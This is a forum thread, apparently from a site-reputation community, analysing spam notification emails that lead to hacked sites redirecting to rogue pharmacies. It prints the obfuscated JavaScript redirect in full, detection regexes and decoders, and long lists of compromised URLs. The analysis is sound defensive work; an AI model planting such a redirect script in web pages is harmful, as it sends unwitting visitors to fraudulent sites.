
  1. Anonymous on Fri 05 Feb 2016, 06:31:55 AM UTC

    Fake WhatsApp / Facebook / LinkedIn notifications

    I often receive fake notifications (WhatsApp, LinkedIn, Google or Facebook), where the link is in fact that of a compromised site, which redirects to an online pharmacy.

    Fake notifications:

    Malicious code:

    Tool to safely check source code:  https://wget.alanreed.org/

    The code converts Unicode values into characters. That allows it to encode the redirection and the URL, so it is less detectable by AV.

    The malicious code in the capture performs this redirection after a timeout of 1 second.

    setTimeout(window.top.location.href='hxxp://yourdrugquality.ru',1266)

    Some compromised sites:

    wisehosting.co.uk
    pro-gre.ru
    meiguojeep.com
    stonewallcommunications.com
    yellowslate.com
    clashofclanshacking.net
    mombassatarifa.com
    lgamenagements.fr
    edu-tech-int.com

Comments:

  1. A440 on Fri 05 Feb 2016, 03:16:24 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    Yes, I get the same but they obviously link to different sites that are hijacked.

  2. Matiks (not verified) on Fri 05 Feb 2016, 07:05:04 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    In fact, this "malicious code" has its own signature, which I translated into a regex. That allows me to safely check for its presence in a web page (via URL).


    <?php
    // Signature of the obfuscated redirect: a function that subtracts a fixed
    // offset from each entry of a char-code array, then setTimeout() on its result.
    $regexp = "function\\s*(\\w+)\\(\\)\\s*\\{\\s*";       // function checke() {
    $regexp .= "\\w+\\s*=\\s*(\\d+);\\s*";                // checka=74;
    $regexp .= "\\w+\\s*=\\s*\\[(.*)\\];\\s*";            // checkb=[...];
    $regexp .= "\\w+\\s*=\\s*(.*);\\s*";                  // checkc="";
    $regexp .= "for\\s*\\(\\s*\\w+\\s*=\\s*0\\s*;\\s*\\w+\\s*<\\s*\\w+\\.length;\\s*\\w+\\+\\+\\s*\\)\\s*\\{\\s*";
    $regexp .= "\\w+\\s*\\+=\\s*String\\.fromCharCode\\(\\w+\\[\\w+\\]\\s*-\\s*\\w+\\);\\s*";
    $regexp .= "\\}\\s*";
    $regexp .= "return\\s*\\w+;\\s*";
    $regexp .= "}\\s*";
    $regexp .= "setTimeout\\s*\\(\\w+\\(\\)\\s*,\\s*(\\d+)\\s*\\)";

    // Captures: 1 = function name, 2 = offset, 3 = char-code list, 4 = accumulator
    // initializer, 5 = timeout in ms. The "s" modifier lets the array span lines;
    // $script holds the content of one <script> tag.
    if (preg_match('/' . $regexp . '/s', $script, $m)) {
        echo "signature found: fires after {$m[5]} ms\n";
    }

    If a page has this malicious code, I can safely reconstruct the attempted action and display the results.

  3. Matiks (not verified) on Sat 06 Feb 2016, 06:32:41 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    longhairitage.com
    gowildmexico.com

    ==> medicalsafeservices.ru

  4. Myxt on Sun 07 Feb 2016, 08:05:56 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    Originally posted by: Matiks
    In fact, this "malicious code" has its own signature, which I translated into a regex. That allows me to safely check for its presence in a web page (via URL). ...

    I keep a test file on my desktop - "X.htm" - which contains only
    ____

    <html><head></head><body><script>

    </script></body></html>
    ____

    and copy / paste the script content into the blank line
    ____

    <html><head></head><body><script>
    function checke() { checka=74; checkb=[193,179,184,174,185,193,120,190,185,186,120,182,185,173,171,190,179,
    185,184,120,178,188,175,176,135,113,178,190,190,186,132,121,121,190,188,191,189,190,175,174,190,171,172,
    189,183,171,188,190,120,188,191,113,133]; checkc=""; for(checkd=0;checkd<checkb.length;checkd++)
    { checkc+=String.fromCharCode(checkb[checkd]-checka); } return checkc; }
    setTimeout(checke(),1308);
    </script></body></html>
    ____

    then change the setTimeout instruction to document.write
    ____

    <html><head></head><body><script>
    function checke() { checka=74; checkb=[193,179,184,174,185,193,120,190,185,186,120,182,185,173,171,190,179,
    185,184,120,178,188,175,176,135,113,178,190,190,186,132,121,121,190,188,191,189,190,175,174,190,171,172,
    189,183,171,188,190,120,188,191,113,133]; checkc=""; for(checkd=0;checkd<checkb.length;checkd++)
    { checkc+=String.fromCharCode(checkb[checkd]-checka); } return checkc; }
    document.write(checke());
    </script></body></html>
    ____

    then save the file and double-click to open in my default browser. The document.write displays one line of text on a blank page
    ____

    window.top.location.href='http://trustedtabsmart.ru';
    ____

    This way, any math and/or substitutions - that are used to further obfuscate the code - will produce the intended executable string, except that it will be written as a line of text instead of being executed.

    For those that don't know, to set "window.top.location.href" equal to an address is to load that address into the top-most window (within a given browser tab). It's called the "top" (highest "parent") window because it may contain "child" windows such as inline frames.

  5. Matiks (not verified) on Sun 07 Feb 2016, 08:26:29 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    You may be interested to use this tool:

    https://matiks.net/MyWOT/analyzeRedirect

    • Curl call to the URL.
    • Content dealt as a DOM (via loadHTML)
    • Look at the content of script tags with the regexp (cf above)
    • Regex matches => extracts the useful info to safely reconstruct the attempted action
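
The three approaches above (Matiks' signature regex in comment 2, Myxt's document.write substitution in comment 4, and the analyzeRedirect pipeline in comment 5) can be combined into one static decoder. The script below is an added example, not the code of the analyzeRedirect tool or of either poster: it ports the signature regex to JavaScript (tightened so the array capture cannot run past the closing bracket), pulls the char-code array, the offset and the delay straight out of the match, and rebuilds the string the page would hand to setTimeout() without evaluating any of the page's script. The helper names (scriptBodies, decodeMatch, analyzeHtml) are the example's own; the sample page is Myxt's X.htm from comment 4 with the char codes copied from that post. Two points the thread touches on but does not spell out: because checke() returns a string, setTimeout(checke(),1308) calls checke() immediately and then evaluates the returned string as code after 1308 ms, which is why the redirect is delayed even though the decoder runs at once; and Myxt's document.write method still executes the attacker's decoder function in a real browser, whereas the script below runs no untrusted code at all.

```javascript
'use strict';

// Added example: static decoder for the obfuscated redirect discussed in this
// thread. Nothing taken from the analysed page is ever evaluated.

// Port of the signature regex from comment 2. Capture groups:
//   1 function name, 2 offset, 3 char-code array body,
//   4 accumulator initializer, 5 setTimeout delay in ms.
// Assumptions of this example, differing from the PHP original: the array
// capture is [^\]]* rather than .* so it cannot run past the closing bracket,
// and the "s" (dotAll) flag lets the array span several lines.
const SIGNATURE = new RegExp(
  'function\\s*(\\w+)\\(\\)\\s*\\{\\s*' +
  '\\w+\\s*=\\s*(\\d+);\\s*' +
  '\\w+\\s*=\\s*\\[([^\\]]*)\\];\\s*' +
  '\\w+\\s*=\\s*(.*?);\\s*' +
  'for\\s*\\(\\s*\\w+\\s*=\\s*0\\s*;\\s*\\w+\\s*<\\s*\\w+\\.length;\\s*\\w+\\+\\+\\s*\\)\\s*\\{\\s*' +
  '\\w+\\s*\\+=\\s*String\\.fromCharCode\\(\\w+\\[\\w+\\]\\s*-\\s*\\w+\\);\\s*' +
  '\\}\\s*return\\s*\\w+;\\s*\\}\\s*' +
  'setTimeout\\s*\\(\\w+\\(\\)\\s*,\\s*(\\d+)\\s*\\)',
  's'
);

// Return the body of every <script> element in an HTML string. A regex is
// enough for inline scripts; the forum tool uses a real DOM parser instead.
function scriptBodies(html) {
  const bodies = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) bodies.push(m[1]);
  return bodies;
}

// Rebuild the string the page's decoder function would return by doing the
// same subtraction the obfuscated loop does, then pull the redirect target out
// of it. setTimeout() received a *string*, so the browser would have evaluated
// that string as code once the delay elapsed.
function decodeMatch(m) {
  const offset = parseInt(m[2], 10);
  const codes = m[3].split(',').map(s => parseInt(s.trim(), 10));
  if (codes.some(Number.isNaN)) throw new Error('non-numeric entry in char-code array');
  const decoded = String.fromCharCode(...codes.map(c => c - offset));
  const target = decoded.match(/location(?:\.href)?\s*=\s*['"]([^'"]+)['"]/);
  return {
    functionName: m[1],
    offset,
    timeoutMs: parseInt(m[5], 10),
    decoded,
    redirectTo: target ? target[1] : null,
  };
}

// Scan a whole document: one finding per <script> that matches the signature.
function analyzeHtml(html) {
  const findings = [];
  for (const body of scriptBodies(html)) {
    const m = SIGNATURE.exec(body);
    if (m) findings.push(decodeMatch(m));
  }
  return findings;
}

// Constructed sample input: Myxt's X.htm from comment 4, char codes copied
// from that post.
const SAMPLE_HTML = `<html><head></head><body><script>
function checke() { checka=74; checkb=[193,179,184,174,185,193,120,190,185,186,120,182,185,173,171,190,179,
185,184,120,178,188,175,176,135,113,178,190,190,186,132,121,121,190,188,191,189,190,175,174,190,171,172,
189,183,171,188,190,120,188,191,113,133]; checkc=""; for(checkd=0;checkd<checkb.length;checkd++)
{ checkc+=String.fromCharCode(checkb[checkd]-checka); } return checkc; }
setTimeout(checke(),1308);
</script></body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of analyzeHtml(SAMPLE_HTML)) {
    console.log(`${f.functionName}(): offset ${f.offset}, fires after ${f.timeoutMs} ms`);
    console.log(`  decoded : ${f.decoded}`);
    console.log(`  redirect: ${f.redirectTo}`);
  }
}
```

Run it with node; for a live page, pass the HTML fetched with curl to analyzeHtml() instead of SAMPLE_HTML. The regex is anchored to this exact construction on purpose: renamed variables still match (they are \w+), but a change of shape, say an addition instead of a subtraction, will not, and the right response is to add a second signature rather than loosen this one.
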
  6. A440 on Sun 07 Feb 2016, 01:43:13 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    fusiontsinc.com/wp-content/executive.php

  7. Matiks (not verified) on Mon 08 Feb 2016, 07:06:31 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    thefrugalstore.com

    thefrugalstore.com/blacking.php => naturalpillmall.ru

  8. Myxt on Mon 08 Feb 2016, 09:35:13 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    Originally posted by: Matiks
    https://matiks.net/MyWOT/analyzeRedirect

    Slick! (that's a compliment)

    Hacked redirectors, not yet red

    List of domains/hosts:

    acrepairofdallas.com
    action-designs.com
    allurecenters.com
    arthurjardim.com.br
    bcda-congo.org
    coalyardcafe.com
    delrayvitamincenter.com
    dorfmaninlove.com
    emscaraibes.com
    foodforfriend.com
    gertm.nl
    j2m.name
    k12futureschool.org
    kentcustoms.com.au
    leightoncarr.com
    lonestarsurvivaltraining.com
    meovatcuocsong.org
    mustafaveis.com
    mytime99.com
    neotripbrasil.hospedagemdesites.ws
    otelug.ru
    paintbuddyinc.com
    pantaisentralpark.com
    qiptech.com
    si.secda.info
    tillalsaeed.com
    unlukablo.com
    urosankimya.com
    zhongguony.com

    Rogue pharmacies, not yet red - none

  9. Matiks (not verified) on Mon 08 Feb 2016, 10:25:28 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    Originally posted by: Myxt
    Slick! (that's a compliment)

    Thanks :)
    I have updated the layout because long URLs broke it (it may be necessary to clear the browser cache).
    I will add a simple tool to get the list of domains that are still flagged as unrated, a kind of MRT list.

    PS: WOT ratings are updated every hour.

  10. Myxt on Tue 09 Feb 2016, 03:40:20 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirectors
    psychologiepraktijkfloor.nl
    sboconsultinggroup.com

  11. Myxt on Tue 09 Feb 2016, 06:29:52 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirector: the-ponderosa.nl

  12. A440 on Tue 09 Feb 2016, 06:31:04 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    Note: I get these things as well on just one account (gmail).

  13. Matiks (not verified) on Wed 10 Feb 2016, 06:57:30 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    viralentodas.com
    cnsbilisim.net

  14. A440 on Wed 10 Feb 2016, 11:48:51 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hwotp://www.quangcaobinhduong.vn/wp-content/plugins/rewarded.php

  15. A440 on Thu 11 Feb 2016, 11:52:02 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hwotp://luger-academia.com.br/chewer.php

    Sent from oneandone.net as well:
    217.160.23.133

  16. Myxt on Fri 12 Feb 2016, 06:18:50 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirector: nochinches.com/microprocessing.php

  17. Matiks (not verified) on Sat 13 Feb 2016, 05:29:37 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    csrforgood.com/wp-content/connective.php

  18. Myxt on Sat 13 Feb 2016, 08:34:03 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirectors:
    tipstomarketing.com/wp-content/uncaught.php
    theproxypromise.com/tints.php

  19. Matiks (not verified) on Sat 13 Feb 2016, 01:56:06 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    qlkh.tueba.edu.vn/heretics.php

  20. A440 on Sat 13 Feb 2016, 05:44:39 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    You already got this one, which just came in here:
    hwotp://neotripbrasil.hospedagemdesites.ws/apricot.php

    Courtesy of 1and1.com

  21. Myxt on Sun 14 Feb 2016, 01:17:26 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirector: crm.iphysicianhub.in/Zend/Validate/patchwork.php

  22. A440 on Mon 15 Feb 2016, 02:43:05 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    Another one that "Myxt" listed earlier just came in:
    hwotp://coalyardcafe.com/wp-content/uploads/emigrating.php
    All of these that hit my gmail account are from a 1and1.com IP address.

  23. Myxt on Mon 15 Feb 2016, 04:11:06 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirectors:
    jefcoinc.net/wp-content/plugins/designation.php
    coastsoccer.com/masrer/snowed.php
    lovephuket.com/wp-content/themes/underling.php

  24. Matiks (not verified) on Mon 15 Feb 2016, 06:24:44 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    gravodisc.com.br/bkp/components/com_jce/editor/tiny_mce/plugins/erasers.php

  25. Myxt on Mon 15 Feb 2016, 10:14:03 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirector: cabanapoolandspa.com/wp-content/salz.php

  26. Myxt on Tue 16 Feb 2016, 07:10:27 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirectors:
    gneve.com/disfiguring.php
    ahalac.fr/wp-content/animism.php

  27. Myxt on Tue 16 Feb 2016, 09:46:51 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    hacked redirector: soonersigns.com/wp-content/dirts.php

  28. Matiks (not verified) on Wed 17 Feb 2016, 08:28:34 AM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    resuflocrm.com/lemmas.php
    schoolwave.ru/plugins/slogin_auth/yahoo/assets/proselytize.php

  29. A440 on Wed 17 Feb 2016, 06:12:39 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    centralmarketingsystems.com/continuously.php

  30. Matiks (not verified) on Wed 17 Feb 2016, 08:15:46 PM UTC

    RE: Fake WhatsApp / Facebook / LinkedIn notifications

    mm1989.it/administrator/components/com_media/researched.php